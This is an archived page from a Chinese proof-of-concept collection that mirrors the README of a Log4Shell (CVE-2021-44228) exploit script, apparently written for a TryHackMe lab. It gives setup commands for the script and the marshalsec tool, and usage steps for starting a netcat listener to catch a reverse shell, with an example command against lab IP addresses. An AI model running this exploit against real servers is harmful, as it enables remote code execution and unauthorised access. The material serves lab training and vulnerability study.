POC详情: 9c33e5d4db758f99c9e1798979fb62192732f1a3

来源
https://github.com/ab0x90/CVE-2021-44228_PoC
关联漏洞
标题: Apache Log4j 代码问题漏洞 (CVE-2021-44228)
描述:Apache Log4j是美国阿帕奇(Apache)基金会的一款基于Java的开源日志记录工具。 Apache Log4J 存在代码问题漏洞,攻击者可设计一个数据请求发送给使用 Apache Log4j工具的服务器,当该请求被打印成日志时就会触发远程代码执行。
介绍
# POC for CVE-2021-44228

This python script was created while I was working on the TryHackMe room for [Log4j](https://tryhackme.com/room/solar). While this was created with default variables for this room, I used argparse to make the script versatile for a GET request.  All necessary varaibles can be changed with different options, see -h for more information.


# Setup
Only my script is hosted here, this requires two other downloads to run properly which I will give links for, but setting up the folders the way I did will allow the script to run without much effort. First create a log4j folder (or whatever name you want) then git clone this repo then move the poc.py into /log4j/.

```sh
git clone https://github.com/ab0x90/CVE-2021-44228_PoC.git
```


Next clone [marshalsec](https://github.com/mbechler/marshalsec), in the same directory you just created. And then build it using maven.
```sh
git clone https://github.com/mbechler/marshalsec.git
cd marshalsec
mvn clean package -DskipTests
```


Lastly, you will need to [download](https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html) some version of Java 8. For this script, and the default value for -j is 'jdk1.8.0_20'. 

The new directory should look like this when everything is extracted.
```sh
kali@kali-[~/tools/Exploits/log4j]$ls -al
total 338448
drwxr-xr-x 5 kali kali      4096 Dec 14 15:22 .
drwx------ 3 kali kali      4096 Dec 14 14:34 ..
drwxr-xr-x 8 kali kali      4096 Jul 30  2014 jdk1.8.0_20
drwxr-xr-x 5 kali kali      4096 Dec 14 14:40 marshalsec
-rw-r--r-- 1 kali kali      2781 Dec 14 16:02 poc.py
```

After this setup is complete. Note that if you would like or need to use a different version of java this can be done using -j NAME_OF_JAVA_FOLDER.

# Usage

Help Menu


![](1.png)


Included in the script is the payload provided in the THM room, change the IP/port to whatever you want to use. 

![](2.png)


Start a netcat listener to catch the shell on the port specified in the java_payload.

Start a python web server on port 8000

Example command:
```sh
python3 poc.py -l 10.6.20.239 -i 10.10.64.53 -p 8983 
```

Example output and reverse shell:


![](4.png)
文件快照

 [4.0K]  /data/pocs/9c33e5d4db758f99c9e1798979fb62192732f1a3
├── [ 35K]  1.png
├── [ 14K]  2.png
├── [ 73K]  4.png
├── [2.8K]  poc.py
└── [2.1K]  README.md

0 directories, 5 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。